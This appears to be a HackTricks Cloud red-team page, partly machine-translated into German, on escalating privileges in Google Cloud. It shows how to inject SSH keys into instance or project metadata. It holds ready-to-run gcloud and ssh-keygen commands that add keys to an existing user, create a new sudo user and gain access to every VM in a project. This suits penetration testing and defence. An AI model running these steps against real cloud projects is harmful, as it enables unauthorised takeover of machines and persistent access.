GCP - Add Custom SSH Metadata

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Modifying the metadata

Die Modifikation von Metadaten auf einer Instanz könnte zu erheblichen Sicherheitsrisiken führen, wenn ein Angreifer die erforderlichen Berechtigungen erlangt.

Incorporation of SSH Keys into Custom Metadata

Auf GCP führen Linux-Systeme häufig Skripte aus der Python Linux Guest Environment for Google Compute Engine aus. Ein kritischer Bestandteil davon ist der accounts daemon, der dazu dient, regelmäßig den Metadaten-Endpunkt der Instanz auf Updates der autorisierten SSH-Öffentlichen Schlüssel zu überprüfen.

Wenn ein Angreifer also benutzerdefinierte Metadaten ändern kann, könnte er den Daemon dazu bringen, einen neuen öffentlichen Schlüssel zu finden, der verarbeitet und in das lokale System integriert wird. Der Schlüssel wird in die Datei ~/.ssh/authorized_keys eines bestehenden Benutzers hinzugefügt oder möglicherweise wird ein neuer Benutzer mit sudo-Rechten erstellt, abhängig vom Format des Schlüssels. Und der Angreifer wird in der Lage sein, den Host zu kompromittieren.

Add SSH key to existing privileged user

Examine Existing SSH Keys on the Instance:

Führen Sie den Befehl aus, um die Instanz und ihre Metadaten zu beschreiben, um vorhandene SSH-Schlüssel zu finden. Der relevante Abschnitt in der Ausgabe befindet sich unter metadata, speziell dem Schlüssel ssh-keys.

gcloud compute instances describe [INSTANCE] --zone [ZONE]

Achten Sie auf das Format der SSH-Schlüssel: Der Benutzername steht vor dem Schlüssel, getrennt durch einen Doppelpunkt.

Prepare a Text File for SSH Key Metadata:

Speichern Sie die Details der Benutzernamen und ihrer entsprechenden SSH-Schlüssel in einer Textdatei mit dem Namen meta.txt. Dies ist wichtig, um die vorhandenen Schlüssel zu erhalten, während neue hinzugefügt werden.

Generate a New SSH Key for the Target User (alice in this example):

Verwenden Sie den Befehl ssh-keygen, um einen neuen SSH-Schlüssel zu generieren, wobei sichergestellt wird, dass das Kommentarfeld (-C) mit dem Zielbenutzernamen übereinstimmt.

ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub

Fügen Sie den neuen öffentlichen Schlüssel zu meta.txt hinzu, indem Sie das Format nachahmen, das in den Metadaten der Instanz gefunden wurde.

Update the Instance's SSH Key Metadata:

Wenden Sie die aktualisierten SSH-Schlüsselmetadaten auf die Instanz an, indem Sie den Befehl gcloud compute instances add-metadata verwenden.

gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt

Access the Instance Using the New SSH Key:

Verbinden Sie sich mit der Instanz über SSH unter Verwendung des neuen Schlüssels und greifen Sie auf die Shell im Kontext des Zielbenutzers (alice in diesem Beispiel) zu.

ssh -i ./key alice@localhost
sudo id

Create a new privileged user and add a SSH key

Wenn kein interessanter Benutzer gefunden wird, ist es möglich, einen neuen zu erstellen, dem sudo-Rechte gegeben werden:

# define the new account username
NEWUSER="definitelynotahacker"

# create a key
ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P ""

# create the input meta file
NEWKEY="$(cat ./key.pub)"
echo "$NEWUSER:$NEWKEY" > ./meta.txt

# update the instance metadata
gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt

# ssh to the new account
ssh -i ./key "$NEWUSER"@localhost

SSH-Schlüssel auf Projektebene

Es ist möglich, den Zugriff auf SSH für mehrere virtuelle Maschinen (VMs) in einer Cloud-Umgebung zu erweitern, indem SSH-Schlüssel auf Projektebene angewendet werden. Dieser Ansatz ermöglicht den SSH-Zugriff auf jede Instanz innerhalb des Projekts, die nicht ausdrücklich die projektweiten SSH-Schlüssel blockiert hat. Hier ist eine zusammengefasste Anleitung:

SSH-Schlüssel auf Projektebene anwenden:

Verwenden Sie den Befehl gcloud compute project-info add-metadata, um SSH-Schlüssel aus meta.txt zu den Metadaten des Projekts hinzuzufügen. Diese Aktion stellt sicher, dass die SSH-Schlüssel in allen VMs des Projekts erkannt werden, es sei denn, eine VM hat die Option "Projektweite SSH-Schlüssel blockieren" aktiviert.

gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt

SSH in Instanzen mit projektweiten Schlüsseln:

Mit den projektweiten SSH-Schlüsseln können Sie in jede Instanz innerhalb des Projekts SSH-en. Instanzen, die projektweite Schlüssel nicht blockieren, akzeptieren den SSH-Schlüssel und gewähren Zugriff.
Eine direkte Methode, um in eine Instanz SSH zu gelangen, ist die Verwendung des Befehls gcloud compute ssh [INSTANCE]. Dieser Befehl verwendet Ihren aktuellen Benutzernamen und die auf Projektebene festgelegten SSH-Schlüssel, um den Zugriff zu versuchen.

Referenzen

https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/

Support HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

PreviousGCP - Compute Privesc NextGCP - Composer Privesc

Last updated 3 days ago